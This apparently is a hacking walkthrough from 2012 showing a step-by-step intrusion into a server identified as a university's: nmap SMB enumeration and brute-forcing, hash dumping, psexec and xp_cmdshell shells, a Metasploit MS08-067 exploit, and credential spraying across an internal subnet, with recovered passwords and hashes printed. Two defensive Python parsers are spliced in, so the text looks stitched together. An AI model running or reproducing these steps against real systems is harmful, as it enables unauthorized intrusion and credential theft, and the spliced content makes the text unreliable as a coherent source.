Guangxi Normal University website http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc        Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// get user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
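The smb-enum-shares and smb-brute runs above, and the smb-check-vulns run further down, all print the same "Host script results:" block. As an added example that is not part of the original post, the following Python parses that block into the findings a defender would triage (anonymous share access, accounts accepting blank or guessable passwords, unpatched hosts); the host address and account values in SAMPLE are constructed.

```python
"""Turn Nmap SMB host-script output into audit findings (added example, not from the post).
Parses the 'Host script results:' block nmap prints for smb-enum-shares, smb-brute and
smb-check-vulns (the output format shown in this post) into what a defender should fix:
shares readable without credentials, accounts that accept a blank or guessable password,
and hosts flagged as unpatched. SAMPLE is constructed; its host and values are made up.
"""
import re

SAMPLE = """\
Nmap scan report for 192.0.2.10
| smb-enum-shares:
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""

ACCESS_RE = re.compile(r"^\|_?\s+Anonymous access:\s+(\S+)$")
LOGIN_RE = re.compile(r"^\|_?\s+(\S+?):(\S*) => Login was successful$")
VULN_RE = re.compile(r"^\|_?\s+(MS\d{2}-\d{3}): VULNERABLE$")

def audit(nmap_text):
    """Return (host, findings); each finding is a (severity, message) tuple."""
    host, findings, script, share = None, [], None, None
    for line in nmap_text.splitlines():
        if line.startswith("Nmap scan report for "):
            host = line.split()[-1].strip("()")   # 'bogon (1.2.3.4)' -> '1.2.3.4'
        if not line.startswith("|"):
            continue                              # outside the script result block
        body = line.lstrip("|_ ")
        if body.startswith("smb-") and body.endswith(":"):
            script = body[:-1]                    # new section, e.g. smb-brute
        elif script == "smb-enum-shares":
            m = ACCESS_RE.match(line)
            if m is None:
                share = body                      # a share-name line such as IPC$
            elif m.group(1) != "<none>":
                findings.append(("medium", f"{share} allows anonymous {m.group(1)}"))
        elif script == "smb-brute" and (m := LOGIN_RE.match(line)):
            user, pw = m.groups()
            kind = "blank" if pw == "<blank>" else "guessable"
            findings.append(("critical" if kind == "blank" else "high",
                             f"account {user} accepted a {kind} password"))
        elif script == "smb-check-vulns" and (m := VULN_RE.match(line)):
            findings.append(("critical", f"{m.group(1)} unpatched"))
    return host, findings
```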
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D43
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
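The smb-pwdump output above is pwdump-format data (user, RID, LM hash, NT hash). As an added example, not the post's own tooling, this Python audits such a dump the way a defender would, flagging accounts with no password and accounts for which an LM hash is stored at all; the account names and hashes in SAMPLE are constructed, apart from the well-known empty-hash constants.

```python
"""Defender's audit of smb-pwdump / pwdump6 output (added example, not the post's tooling).
Lines read 'user:rid => LMhash:NThash' (nmap smb-pwdump, as in the post) or 'user:rid:LMhash:NThash'
(pwdump6), with a literal 'NO PASSWORD***...' placeholder where a hash is absent. Findings: no
password set, an LM hash stored at all (what the NoLMHash setting prevents), and LM's tell-tale
that the password is 7 characters or shorter. SAMPLE is constructed with made-up hashes.
"""
import re

NO_PASSWORD = "NO PASSWORD"                     # prefix of pwdump's placeholder for an absent hash
EMPTY_LM_HALF = "AAD3B435B51404EE"              # LM hash of an empty 7-byte half
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"   # NT hash of the empty string

SAMPLE = """\
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   svc_backup:1002 => 0123456789ABCDEFAAD3B435B51404EE:00112233445566778899AABBCCDDEEFF
|_  alice:1003 => AAD3B435B51404EEAAD3B435B51404EE:FFEEDDCCBBAA99887766554433221100
"""

def parse_line(line):
    """Parse one account line into a dict; ValueError for headers and other non-account lines."""
    line = re.sub(r"^\|_?\s*", "", line.strip()).replace(" => ", ":")
    parts = line.split(":")
    if len(parts) < 4 or not parts[1].isdigit():
        raise ValueError(f"not an account line: {line!r}")
    return {"user": parts[0], "rid": int(parts[1]), "lm": parts[2].upper(), "nt": parts[3].upper()}

def audit_account(acct):
    """Findings for one parsed account, in a fixed order."""
    findings = []
    if acct["nt"] == EMPTY_NT or acct["nt"].startswith(NO_PASSWORD):
        findings.append("blank password")
    if not (acct["lm"].startswith(NO_PASSWORD) or acct["lm"] == EMPTY_LM_HALF * 2):
        findings.append("LM hash stored (NoLMHash not enforced)")
        if acct["lm"].endswith(EMPTY_LM_HALF):
            findings.append("password is 7 characters or shorter")
    return findings

def audit_dump(text):
    """Map user -> findings for every account line that has at least one finding."""
    report = {}
    for line in text.splitlines():
        try:
            acct = parse_line(line)
        except ValueError:
            continue                         # header, blank or non-account line
        if found := audit_account(acct):
            report[acct["user"]] = found
    return report
```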
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "    // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole    // use the ms08-067 exploit in msf to overflow the target machine
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator
root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the captured hash to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

The attack succeeded, a simple msf + nmap attack~~